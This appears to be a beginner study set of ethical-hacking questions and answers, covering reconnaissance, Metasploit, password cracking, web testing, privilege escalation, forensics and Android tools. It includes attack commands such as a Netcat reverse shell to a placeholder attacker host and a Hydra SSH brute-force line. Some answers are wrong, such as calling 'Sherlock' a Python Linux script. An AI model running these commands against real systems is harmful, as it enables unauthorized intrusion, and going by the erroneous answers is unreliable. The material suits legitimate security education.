// Ethical Hacking Fundamentals - Beginner Level

What are the three core principles of information security known as the CIA triad?
Confidentiality, Integrity, and Availability. These principles ensure that information is protected from unauthorized access, maintained in a correct state, and accessible when needed.

What is the primary difference between ethical hacking and malicious hacking?
Ethical hacking is authorized testing with permission from the system owner to identify vulnerabilities, while malicious hacking is unauthorized access for personal gain or malicious purposes.

What is the first phase of any penetration testing engagement?
Reconnaissance, which involves gathering information about the target system through passive and active methods to understand the attack surface.

What is the difference between white-box, black-box, and gray-box testing?
White-box testing provides full knowledge of the system, black-box testing provides no prior knowledge, and gray-box testing provides partial knowledge of the target system.

What is the primary purpose of a vulnerability scan versus a penetration test?
Vulnerability scanning identifies known vulnerabilities and misconfigurations, while penetration testing actively exploits vulnerabilities to determine the extent of potential damage.

What is the most important legal consideration before conducting any security testing?
Obtaining written authorization from the system owner, which clearly defines the scope, duration, and rules of engagement for the testing.

What is the difference between a threat, a vulnerability, and a risk?
A threat is a potential danger, a vulnerability is a weakness that can be exploited, and risk is the likelihood of a threat exploiting a vulnerability causing harm.

What is the primary purpose of the Metasploit Framework?
To provide a comprehensive platform for developing, testing, and executing exploit code against remote target machines in a controlled environment.

What is the basic command to start the Metasploit Framework console?
Type "msfconsole" in your terminal after installing Metasploit, which launches the interactive command-line interface for framework operations.

What is the difference between a reverse shell and a bind shell?
A reverse shell connects back to the attacker's machine, while a bind shell opens a listening port on the target machine that the attacker connects to.

What is the primary function of Nmap in ethical hacking?
Network discovery and security auditing through host discovery, port scanning, service detection, and operating system identification.

What is the difference between TCP and UDP scanning?
TCP scanning establishes full connections to determine if ports are open, while UDP scanning sends UDP packets and analyzes responses to identify open UDP services.

What is the most basic Nmap command to scan for open ports on a target?
"nmap [target_ip]" which performs a basic TCP scan of the top 1000 most common ports on the specified target.

What is the primary purpose of the "ping" command in network reconnaissance?
To test basic network connectivity and determine if a target host is reachable using ICMP echo requests.

What is the difference between active and passive reconnaissance?
Active reconnaissance involves direct interaction with the target, while passive reconnaissance gathers information without direct contact using publicly available sources.

What is the primary function of the "whois" command in ethical hacking?
To query domain registration information and identify ownership details, administrative contacts, and registration dates for target domains.

What is the basic command to perform a DNS zone transfer attempt?
"dig axfr [domain] @[dns_server]" which attempts to retrieve all DNS records for a domain from a specific DNS server.

What is the primary purpose of port scanning in ethical hacking?
To identify open ports and running services on target systems, which helps determine potential attack vectors and vulnerabilities.

What is the difference between a SYN scan and a full TCP connect scan?
A SYN scan sends only SYN packets (stealthier), while a full TCP connect scan completes the three-way handshake, making it more detectable but potentially more accurate.

What is the primary function of the "netstat" command in system enumeration?
To display active network connections, listening ports, and network statistics on both local and remote systems.

What is the basic command to enumerate SMB shares on a target?
"smbclient -L [target_ip]" which lists available SMB shares and provides basic information about shared resources.

What is the primary purpose of banner grabbing in ethical hacking?
To collect service banners and version information from running services, which helps identify potential vulnerabilities and exploits.

What is the difference between vulnerability scanning and version scanning?
Vulnerability scanning identifies known security weaknesses, while version scanning determines specific software versions to match against vulnerability databases.

What is the basic command to perform an HTTP banner grab using Netcat?
"nc -nv [target_ip] 80" then "GET / HTTP/1.0" and press Enter twice to retrieve the web server banner.

What is the primary function of the "curl" command in web reconnaissance?
To transfer data from or to a server using various protocols, useful for retrieving web pages, headers, and testing web applications.

What is the difference between GET and POST HTTP methods?
GET requests data from the server and appears in URLs, while POST submits data to the server and appears in the request body, making it more suitable for sensitive data.

What is the basic command to test HTTP methods using curl?
"curl -X OPTIONS [target_url]" which tests supported HTTP methods and can help identify potential security misconfigurations.

What is the primary purpose of directory enumeration in web testing?
To discover hidden directories and files that may contain sensitive information, administrative interfaces, or additional attack surfaces.

What is the basic tool used for directory enumeration in ethical hacking?
Tools like DirBuster, Gobuster, or Dirb, which systematically scan for directories and files using wordlists.

What is the primary function of the "nikto" web vulnerability scanner?
To scan web servers for known vulnerabilities, dangerous files, outdated server versions, and other security issues.

What is the difference between authentication and authorization?
Authentication verifies identity (who you are), while authorization determines permissions (what you're allowed to do).

What is the basic command to perform a brute force attack on SSH using Hydra?
"hydra -l [username] -P [password_list] ssh://[target_ip]" which attempts to guess SSH credentials using a password list.

What is the primary purpose of password spraying in ethical hacking?
To test a small number of common passwords against many accounts, which helps avoid account lockout detection compared to traditional brute force attacks.

What is the difference between dictionary attacks and brute force attacks?
Dictionary attacks use predefined wordlists, while brute force attacks try all possible character combinations, making brute force more comprehensive but slower.

What is the basic command to create a simple reverse shell using Netcat?
"nc -nv [attacker_ip] [port] -e /bin/bash" on the target, with "nc -lvp [port]" listening on the attacker machine.

What is the primary function of the "wget" command in post-exploitation?
To download files from the web, useful for retrieving additional tools, scripts, or exfiltrating data from compromised systems.

What is the difference between a payload and an exploit in Metasploit?
An exploit takes advantage of a vulnerability to gain access, while a payload is the code that executes after successful exploitation to perform specific actions.

What is the basic command to search for modules in Metasploit?
"search [keyword]" which searches through available exploits, payloads, auxiliary modules, and post-exploitation modules.

What is the primary purpose of the "use" command in Metasploit?
To select a specific module for configuration and execution, such as an exploit, auxiliary module, or post-exploitation tool.

What is the basic command to show available options for a Metasploit module?
"show options" which displays all configurable parameters for the currently selected module, including required and optional settings.

What is the difference between required and optional options in Metasploit?
Required options must be configured for the module to function properly, while optional options provide additional customization but aren't necessary for basic operation.

What is the basic command to set an option in Metasploit?
"set [option_name] [value]" which configures a specific parameter for the currently selected module.

What is the primary function of the "check" command in Metasploit modules?
To test if the target is vulnerable to the selected exploit without actually exploiting it, helping verify exploitability safely.

What is the basic command to execute a Metasploit exploit?
"exploit" or "run" which launches the currently selected exploit module against the configured target.

What is the difference between a staged and a stageless payload?
Staged payloads are delivered in multiple stages (smaller initial payload), while stageless payloads are delivered all at once (larger but more reliable).

What is the primary purpose of the "sessions" command in Metasploit?
To list, interact with, and manage established connections (shells) from successful exploits.

What is the basic command to interact with an established session in Metasploit?
"sessions -i [session_id]" which connects to and allows interaction with a specific compromised system session.

What is the primary function of post-exploitation modules in Metasploit?
To perform additional actions after gaining initial access, such as privilege escalation, persistence, or information gathering.

What is the basic command to perform local privilege escalation in Linux?
"sudo -l" to check sudo permissions, or "find / -perm -4000 -type f 2>/dev/null" to find SUID files for potential privilege escalation.

What is the difference between SUID and SGID permissions in Linux?
SUID allows a program to run with the owner's permissions, while SGID allows it to run with the group's permissions, both potentially useful for privilege escalation.

What is the basic command to search for world-writable files in Linux?
"find / -writable -type f 2>/dev/null" which identifies files that any user can modify, potentially useful for privilege escalation.

What is the primary purpose of the "linpeas" script in Linux privilege escalation?
To automate the enumeration of potential privilege escalation vectors, including misconfigurations, vulnerable software, and sensitive file permissions.

What is the basic command to check running services in Linux?
"ps aux" or "systemctl list-units --type=service --state=running" which displays active processes and services that might be exploitable.

What is the difference between /etc/passwd and /etc/shadow files?
/etc/passwd contains basic user account information readable by all users, while /etc/shadow contains encrypted passwords readable only by root.

What is the basic command to crack Linux password hashes using John the Ripper?
"john --wordlist=[wordlist] [password_file]" which attempts to crack password hashes using a dictionary attack.

What is the primary purpose of the "hashcat" tool in password cracking?
To perform high-speed password cracking using GPU acceleration, supporting various hash types and attack methods.

What is the basic command to perform a dictionary attack with Hashcat?
"hashcat -m [hash_type] -a 0 [hash_file] [wordlist]" which performs a dictionary attack against specified password hashes.

What is the difference between online and offline password cracking?
Online cracking attempts against live services with rate limiting, while offline cracking works on captured hash files without network constraints.

What is the primary purpose of the "cewl" tool in password generation?
To generate custom wordlists from target websites by extracting unique words, creating more targeted password lists for cracking attacks.

What is the basic command to create a custom wordlist with Cewl?
"cewl -d [depth] -m [min_length] -w [output_file] [target_url]" which extracts words from a website to create a password wordlist.

What is the primary function of the "crunch" tool in password generation?
To generate custom wordlists based on specified character sets and patterns, useful for creating comprehensive password lists.

What is the basic command to generate a numeric password list with Crunch?
"crunch [min_length] [max_length] 0123456789 -o [output_file]" which creates all possible numeric combinations within specified length ranges.

What is the difference between rule-based attacks and mask attacks in Hashcat?
Rule-based attacks apply transformation rules to dictionary words, while mask attacks use patterns to generate passwords with specific character positions.

What is the primary purpose of the "maskprocessor" tool in Hashcat?
To generate password candidates based on custom masks, allowing precise control over password patterns for targeted attacks.

What is the basic command to perform a mask attack with Hashcat?
"hashcat -m [hash_type] -a 3 [hash_file] [mask]" which performs a mask attack using a specified pattern for password generation.

What is the primary function of the "sqlmap" tool in SQL injection testing?
To automate the detection and exploitation of SQL injection vulnerabilities, including database fingerprinting and data extraction.

What is the basic command to test a URL for SQL injection with sqlmap?
"sqlmap -u [target_url] --dbs" which tests the specified URL for SQL injection and attempts to enumerate available databases.

What is the difference between in-band and blind SQL injection?
In-band injection returns results directly in the application response, while blind injection requires inference techniques to extract data.

What is the primary purpose of the "burp suite" tool in web security testing?
To intercept, analyze, and modify web traffic between your browser and web applications, enabling comprehensive security testing.

What is the basic process to set up Burp Suite for web testing?
Configure browser proxy to use Burp Suite (localhost:8080), enable intercept, and browse through the application to capture and analyze requests.

What is the difference between the Repeater and Intruder modules in Burp Suite?
Repeater allows manual modification and resending of individual requests, while Intruder automates attacks with multiple payloads and positions.

What is the primary purpose of the "sequencer" module in Burp Suite?
To analyze the randomness of tokens, session IDs, and other security-critical values to identify potential predictability vulnerabilities.

What is the basic command to perform web application scanning with OWASP ZAP?
"zap.sh -cmd -quickurl [target_url]" which launches ZAP and performs an automated scan of the specified web application.

What is the difference between active and passive scanning in OWASP ZAP?
Passive scanning analyzes traffic without sending additional requests, while active scanning sends specific attack payloads to identify vulnerabilities.

What is the primary purpose of the "spider" functionality in web security tools?
To automatically crawl and map web applications, discovering all pages, forms, and functionality available for testing.

What is the basic command to perform subdomain enumeration with Sublist3r?
"python sublist3r.py -d [domain] -o [output_file]" which enumerates subdomains for the specified domain using multiple search engines.

What is the difference between DNS brute forcing and DNS scraping?
DNS brute forcing tries possible subdomain names, while DNS scraping collects subdomains from public sources like search engines and certificates.

What is the primary purpose of the "amass" tool in reconnaissance?
To perform comprehensive external network mapping by enumerating subdomains, discovering hosts, and mapping attack surfaces.

What is the basic command to perform subdomain enumeration with Amass?
"amass enum -d [domain]" which enumerates subdomains and related infrastructure for the specified domain.

What is the difference between passive and active reconnaissance in Amass?
Passive mode uses only public information sources, while active mode performs direct DNS queries and port scanning for more comprehensive results.

What is the primary purpose of the "shodan" search engine in ethical hacking?
To find internet-connected devices, services, and vulnerabilities, enabling reconnaissance of exposed systems and potential attack surfaces.

What is the basic search query to find web cameras using Shodan?
"webcam" or "netcam" which searches for internet-connected web cameras and their associated information.

What is the difference between Shodan and Censys for internet scanning?
Shodan focuses on device and service discovery, while Censys provides more detailed certificate and protocol information with better search capabilities.

What is the primary purpose of the "crt.sh" website in subdomain enumeration?
To search certificate transparency logs for subdomains associated with a target domain, revealing additional attack surfaces.

What is the basic process to use certificate transparency for subdomain discovery?
Search the target domain on crt.sh, extract unique subdomains from the results, and add them to your target list for further testing.

What is the primary function of the "waybackurls" tool in reconnaissance?
To extract URLs from the Wayback Machine archives for a target domain, discovering forgotten pages, parameters, and potential vulnerabilities.

What is the basic command to extract URLs from Wayback Machine with waybackurls?
"echo [domain] | waybackurls" which retrieves and displays all archived URLs for the specified domain.

What is the difference between the Wayback Machine and Google dorking for URL discovery?
Wayback Machine provides historical archives, while Google dorking finds currently indexed pages using advanced search operators.

What is the primary purpose of the "gau" tool in URL discovery?
To Get All URLs from web archives for a target domain, providing comprehensive URL enumeration for security testing.

What is the basic command to use GAU for URL enumeration?
"gau [domain]" which retrieves all known URLs for the specified domain from multiple sources.

What is the difference between JavaScript file analysis and parameter discovery in web testing?
JavaScript analysis examines client-side code for endpoints and secrets, while parameter discovery identifies input points for testing vulnerabilities.

What is the primary purpose of the "jsfinder" tool in JavaScript analysis?
To extract endpoints, API keys, and sensitive information from JavaScript files, revealing additional attack surfaces and potential vulnerabilities.

What is the basic command to analyze JavaScript files with JSFinder?
"python JSFinder.py -u [target_url]" which analyzes JavaScript files on the target website for endpoints and sensitive information.

What is the difference between manual and automated JavaScript analysis?
Manual analysis allows deeper understanding of code logic, while automated analysis quickly extracts patterns and endpoints from multiple files.

What is the primary purpose of the "linkfinder" tool in JavaScript endpoint discovery?
To extract endpoints and URLs from JavaScript files using regular expressions, helping discover hidden functionality and API endpoints.

What is the basic command to use LinkFinder for endpoint discovery?
"python3 LinkFinder.py -i [javascript_file] -o cli" which analyzes a JavaScript file and displays discovered endpoints in the command line.

What is the difference between client-side and server-side vulnerabilities?
Client-side vulnerabilities affect the user's browser, while server-side vulnerabilities affect the server infrastructure and data processing.

What is the primary purpose of the "xsser" tool in cross-site scripting testing?
To automate the detection and exploitation of XSS vulnerabilities across multiple parameters and attack vectors.

What is the basic command to test for XSS with XSSer?
"xsser -u [target_url] --auto" which automatically tests the specified URL for various XSS vulnerabilities.

What is the difference between reflected, stored, and DOM-based XSS?
Reflected XSS is immediately reflected in responses, stored XSS is permanently stored on the server, and DOM-based XSS manipulates the DOM in the browser.

What is the primary purpose of the "commix" tool in command injection testing?
To automate the detection and exploitation of command injection vulnerabilities in web applications and operating systems.

What is the basic command to test for command injection with Commix?
"commix -u [target_url]" which automatically tests the specified URL for command injection vulnerabilities.

What is the difference between OS command injection and code injection?
OS command injection executes operating system commands, while code injection injects and executes programming code in the application context.

What is the primary purpose of the "ssrfmap" tool in server-side request forgery testing?
To automate the detection and exploitation of SSRF vulnerabilities by testing various payloads and analyzing responses.

What is the basic command to test for SSRF with SSRFmap?
"python3 ssrfmap.py -u [target_url] -p [parameter]" which tests the specified parameter for SSRF vulnerabilities using various payloads.

What is the difference between blind and direct SSRF vulnerabilities?
Direct SSRF returns the response from the requested resource, while blind SSRF doesn't return responses and requires inference techniques.

What is the primary purpose of the "tplmap" tool in template injection testing?
To automate the detection and exploitation of template injection vulnerabilities in various templating engines.

What is the basic command to test for template injection with TPLmap?
"python3 tplmap.py -u [target_url]" which automatically tests the specified URL for template injection vulnerabilities.

What is the difference between server-side template injection and client-side template injection?
Server-side SSTI executes on the server with system access, while client-side template injection executes in the browser with limited capabilities.

What is the primary purpose of the "nosqli" tool in NoSQL injection testing?
To automate the detection and exploitation of NoSQL injection vulnerabilities in MongoDB and other NoSQL databases.

What is the basic command to test for NoSQL injection with nosqli?
"python3 nosqli.py -u [target_url] -p [parameter]" which tests the specified parameter for NoSQL injection vulnerabilities.

What is the difference between SQL injection and NoSQL injection?
SQL injection targets relational databases using SQL syntax, while NoSQL injection targets NoSQL databases using their specific query syntax and operators.

What is the primary purpose of the "xxer" tool in XML external entity testing?
To automate the detection and exploitation of XXE vulnerabilities in XML processing systems.

What is the basic command to test for XXE vulnerabilities with XXER?
"python3 xxer.py -u [target_url]" which automatically tests the specified URL for XXE vulnerabilities using various payloads.

What is the difference between blind XXE and direct XXE vulnerabilities?
Direct XXE returns the results of external entity requests, while blind XXE requires out-of-band techniques to confirm exploitation.

What is the primary purpose of the "jwt_tool" in JWT security testing?
To analyze, manipulate, and crack JSON Web Tokens for security testing and vulnerability assessment.

What is the basic command to analyze a JWT token with jwt_tool?
"python3 jwt_tool.py [jwt_token]" which analyzes the JWT token structure, signature algorithm, and potential vulnerabilities.

What is the difference between JWT signature attacks and algorithm confusion attacks?
Signature attacks attempt to forge or crack signatures, while algorithm confusion attacks manipulate the algorithm field to bypass verification.

What is the primary purpose of the "cme" (CrackMapExec) tool in network penetration testing?
To automate network penetration testing by enumerating services, exploiting vulnerabilities, and executing commands across multiple hosts.

What is the basic command to perform SMB enumeration with CrackMapExec?
"crackmapexec smb [target_range] -u [username] -p [password]" which enumerates SMB services and attempts authentication across the target range.

What is the difference between SMB and RPC enumeration in network testing?
SMB enumeration focuses on file sharing and authentication, while RPC enumeration discovers remote procedure call services and their capabilities.

What is the primary purpose of the "bloodhound" tool in Active Directory security?
To analyze and visualize Active Directory relationships to identify attack paths and privilege escalation opportunities.

What is the basic command to collect data with BloodHound?
"bloodhound-python -c All -d [domain] -u [username] -p [password]" which collects comprehensive Active Directory data for analysis.

What is the difference between local and domain privilege escalation in Windows?
Local privilege escalation gains administrative rights on a single machine, while domain privilege escalation gains control over the entire Active Directory domain.

What is the primary purpose of the "powerup" script in Windows privilege escalation?
To identify common Windows privilege escalation vectors including misconfigurations, vulnerable services, and weak permissions.

What is the basic command to run PowerUp in PowerShell?
"Import-Module .\PowerUp.ps1; Invoke-AllChecks" which loads the PowerUp module and performs comprehensive privilege escalation checks.

What is the difference between service misconfigurations and permission abuses in Windows?
Service misconfigurations exploit vulnerable service settings, while permission abuses take advantage of excessive file or registry permissions.

What is the primary purpose of the "sherlock" script in Linux privilege escalation?
To identify common Linux privilege escalation vectors including kernel vulnerabilities, SUID binaries, and misconfigurations.

What is the basic command to run Sherlock in Python?
"python3 sherlock.py" which performs comprehensive Linux privilege escalation checks and displays potential exploitation vectors.

What is the difference between kernel exploits and configuration abuses in Linux?
Kernel exploits target vulnerabilities in the operating system kernel, while configuration abuses take advantage of system misconfigurations and weak permissions.

What is the primary purpose of the "linuxprivchecker" script in Linux enumeration?
To perform comprehensive Linux system enumeration for privilege escalation opportunities and security misconfigurations.

What is the basic command to run Linux Privilege Checker?
"python3 linuxprivchecker.py" which enumerates system information, running processes, network configuration, and potential privilege escalation vectors.

What is the difference between automated enumeration tools and manual techniques?
Automated tools quickly identify common vulnerabilities, while manual techniques allow deeper analysis and discovery of unique misconfigurations.

What is the primary purpose of the "winpeas" script in Windows privilege escalation?
To perform comprehensive Windows enumeration for privilege escalation opportunities, similar to LinPEAS for Linux systems.

What is the basic command to run WinPEAS in Windows?
".\winPEAS.exe" or ".\winPEAS.bat" which performs comprehensive Windows system enumeration and displays potential privilege escalation vectors.

What is the difference between Windows and Linux privilege escalation methodologies?
Windows focuses on services, permissions, and Active Directory, while Linux focuses on SUID files, kernel exploits, and configuration misconfigurations.

What is the primary purpose of the "pspy" tool in Linux process monitoring?
To monitor running processes without root privileges, identifying cron jobs, scheduled tasks, and background processes for potential exploitation.

What is the basic command to run pspy for process monitoring?
"./pspy32" or "./pspy64" depending on system architecture, which monitors and displays running processes and scheduled tasks.

What is the difference between static and dynamic analysis in malware analysis?
Static analysis examines malware without executing it, while dynamic analysis observes malware behavior in a controlled environment.

What is the primary purpose of the "strings" command in basic malware analysis?
To extract readable strings from binary files, helping identify potential functionality, URLs, and configuration information.

What is the basic command to extract strings from a binary file?
"strings [binary_file]" which displays all readable strings from the specified file, useful for initial malware analysis.

What is the difference between file signature analysis and entropy analysis in malware detection?
File signature analysis identifies known malware patterns, while entropy analysis measures randomness to detect packed or encrypted malware.

What is the primary purpose of the "exiftool" in digital forensics?
To extract and analyze metadata from files, including creation dates, author information, and hidden data that might be relevant to investigations.

What is the basic command to analyze file metadata with ExifTool?
"exiftool [file]" which displays comprehensive metadata information for the specified file.

What is the difference between file system forensics and memory forensics?
File system forensics analyzes stored data on disk, while memory forensics analyzes volatile data in RAM for active processes and network connections.

What is the primary purpose of the "volatility" framework in memory forensics?
To analyze memory dumps for running processes, network connections, and malware artifacts, providing insights into system state at the time of capture.

What is the basic command to list processes in a memory dump with Volatility?
"volatility -f [memory_dump] --profile=[profile] pslist" which displays running processes from the memory dump using the appropriate system profile.

What is the difference between live forensics and dead forensics?
Live forensics analyzes running systems without shutting them down, while dead forensics analyzes powered-off systems and disk images.

What is the primary purpose of the "autopsy" tool in digital forensics?
To provide a graphical interface for analyzing disk images and file systems, making forensic analysis more accessible and organized.

What is the basic process to analyze a disk image with Autopsy?
Create a new case, add the disk image as evidence, and use the various analysis modules to examine files, registry, and timeline data.

What is the difference between timeline analysis and keyword searching in forensics?
Timeline analysis reconstructs events chronologically, while keyword searching searches for specific terms or patterns across the evidence.

What is the primary purpose of the "bulk_extractor" tool in forensic analysis?
To extract specific features like URLs, email addresses, and domain names from disk images without analyzing the entire file system structure.

What is the basic command to run bulk_extractor on a disk image?
"bulk_extractor [image_file] -o [output_directory]" which extracts features from the disk image and saves them to the specified output directory.

What is the difference between file carving and file system analysis in forensics?
File carving recovers files based on content patterns without file system metadata, while file system analysis uses directory structures and metadata.

What is the primary purpose of the "foremost" tool in file carving?
To recover specific file types from disk images based on header and footer patterns, useful for recovering deleted or hidden files.

What is the basic command to carve JPEG files with Foremost?
"foremost -t jpeg -i [image_file] -o [output_directory]" which recovers JPEG files from the disk image and saves them to the output directory.

What is the difference between logical and physical acquisitions in mobile forensics?
Logical acquisition copies user-accessible data, while physical acquisition copies the entire device memory including deleted data and system areas.

What is the primary purpose of the "adb" (Android Debug Bridge) in mobile forensics?
To communicate with Android devices for data extraction, application analysis, and device control during forensic investigations.

What is the basic command to list connected Android devices with ADB?
"adb devices" which displays all connected Android devices in debugging mode, showing their serial numbers and connection status.

What is the difference between Android and iOS forensic acquisition methods?
Android allows more direct file system access, while iOS requires specialized tools and techniques due to stronger security controls and encryption.

What is the primary purpose of the "ios-deploy" tool in iOS application analysis?
To install and debug iOS applications on connected devices, useful for analyzing app behavior and extracting data during forensic investigations.

What is the basic command to install an iOS app with ios-deploy?
"ios-deploy --bundle [app_bundle_path]" which installs the specified iOS application on the connected device.

What is the difference between application analysis and device analysis in mobile forensics?
Application analysis focuses on individual app data and behavior, while device analysis examines the entire device including system files and partitions.

What is the primary purpose of the "frida" tool in dynamic mobile analysis?
To perform dynamic instrumentation and analysis of mobile applications, allowing runtime manipulation and security testing.

What is the basic command to attach Frida to a running Android application?
"frida -U -f [package_name] --no-pause" which attaches Frida to the specified Android application and starts the script interaction.

What is the difference between static and dynamic mobile application analysis?
Static analysis examines app code and resources without execution, while dynamic analysis observes app behavior during runtime execution.

What is the primary purpose of the "objection" tool in mobile runtime exploration?
To provide runtime mobile exploration capabilities, allowing security testing and analysis of iOS and Android applications without jailbreak/root.

What is the basic command to explore an Android application with Objection?
"objection -g [package_name] explore" which starts runtime exploration of the specified Android application.

What is the difference between jailbroken and non-jailbroken iOS analysis?
Jailbroken devices provide full file system access and debugging capabilities, while non-jailbroken analysis relies on runtime manipulation techniques.

What is the primary purpose of the "mobSF" (Mobile Security Framework) tool?
To provide comprehensive mobile application security analysis including static analysis, dynamic analysis, and API security testing.

What is the basic process to analyze an Android app with MobSF?
Upload the APK file to the MobSF web interface, wait for analysis completion, and review the comprehensive security report.

What is the difference between automated and manual mobile security testing?
Automated testing quickly identifies common vulnerabilities, while manual testing discovers complex logic flaws and business logic vulnerabilities.

What is the primary purpose of the "drozer" tool in Android security testing?
To perform dynamic security assessment of Android applications through runtime interaction and vulnerability exploitation.

What is the basic command to start a Drozer session with an Android device?
"drozer console connect" which starts the Drozer console and connects to the Android device for interactive security testing.

What is the difference between AndroidManifest.xml analysis and runtime analysis in Android security?
Manifest analysis examines app permissions and components statically, while runtime analysis observes actual behavior during execution.

What is the primary purpose of the "apktool" tool in Android reverse engineering?
To decompile APK files to smali code and resources, allowing analysis and modification of Android applications.

What is the basic command to decompile an APK with APKTool?
"apktool d [apk_file]" which decompiles the specified APK file into smali code and resources for analysis.

What is the difference between smali code and Java source code in Android analysis?
Smali is the low-level assembly representation of Android bytecode, while Java source code provides higher-level understanding but requires additional decompilation steps.

What is the primary purpose of the "jadx" tool in Android application analysis?
To decompile APK files to Java source code, providing more readable code for security analysis and vulnerability identification.

What is the basic command to decompile an APK to Java with JADX?
"jadx [apk_file]" or "jadx-gui [apk_file]" which decompiles the APK to Java source code in command line or graphical interface.

What is the difference between static decompilation and dynamic analysis in Android security?
Static decompilation examines code without execution, while dynamic analysis observes app behavior during runtime to identify runtime vulnerabilities.

What is the primary purpose of the "aapt" (Android Asset Packaging Tool) in Android analysis?
To extract and analyze Android application metadata, permissions, and components from APK files without full decompilation.

What is the basic command to list permissions with AAPT?
"aapt dump permissions [apk_file]" which displays all permissions requested by the specified Android application.

What is the difference between permission analysis and component analysis in Android security?
Permission analysis examines requested permissions and their security implications, while component analysis examines activities, services, and receivers for vulnerabilities.

What is the primary purpose of the "keytool" in Android certificate analysis?
To analyze and extract certificate information from Android applications, helping identify signing certificates and potential security issues.

What is the basic command to extract certificate information with keytool?
"keytool -printcert -jarfile [apk_file]" which displays certificate details including issuer, validity period, and fingerprint information.

What is the difference between certificate analysis and code analysis in Android security?
Certificate analysis examines signing and authenticity, while code analysis examines application logic and implementation vulnerabilities.

What is the primary purpose of the "zipalign" tool in Android application optimization?
To optimize APK files by aligning uncompressed data on 4-byte boundaries, improving performance and reducing memory usage.

What is the basic command to optimize an APK with ZipAlign?
"zipalign -v 4 [input_apk] [output_apk]" which aligns the input APK and saves the optimized version to the specified output file.

What is the difference between APK optimization and APK signing in Android development?
Optimization improves performance and alignment, while signing ensures authenticity and integrity of the application package.

What is the primary purpose of the "apksigner" tool in Android application security?
To sign APK files with digital certificates, ensuring authenticity and enabling installation on Android devices.

What is the basic command to sign an APK with APKSigner?
"apksigner sign --ks [keystore] --ks-key-alias [alias] [apk_file]" which signs the specified APK using the provided keystore and alias.

What is the difference between debug signing and release signing in Android applications?
Debug signing uses default certificates for testing, while release signing uses production certificates for distribution and requires proper security.

What is the primary purpose of the "proguard" tool in Android code obfuscation?
To obfuscate Java bytecode by renaming classes, fields, and methods, making reverse engineering more difficult while maintaining functionality.

What is the basic command to obfuscate code with ProGuard?
"proguard @proguard.config" which applies obfuscation rules specified in the configuration file to the compiled application.

What is the difference between code obfuscation and code encryption in mobile security?
Obfuscation makes code difficult to understand but still executable, while encryption requires decryption before execution and provides stronger protection.

What is the primary purpose of the "ndk-build" tool in Android native development?
To compile native C/C++ code into shared libraries for Android applications, enabling performance-critical operations and hardware access.

What is the basic command to build native code with NDK-Build?
"ndk-build" which compiles native source code in the current directory using Android.mk build files.

What is the difference between Java/Kotlin development and native development in Android?
Java/Kotlin development uses the Android framework and runs on the JVM, while native development uses C/C++ for performance-critical operations and direct hardware access.

What is the primary purpose of the "gradle" build system in Android development?
To automate the build process including compilation, packaging, and dependency management for Android applications.

What is the basic command to build an Android app with Gradle?
"./gradlew assembleDebug" or "./gradlew assembleRelease" which builds the application in debug or release configuration respectively.

What is the difference between debug builds and release builds in Android applications?
Debug builds include debugging information and can be easily analyzed, while release builds are optimized, obfuscated, and more secure for distribution.

This comprehensive beginner-level collection provides the foundation for ethical hacking with 200+ questions covering all fundamental concepts, tools, and methodologies needed to start your journey in cybersecurity and penetration testing.
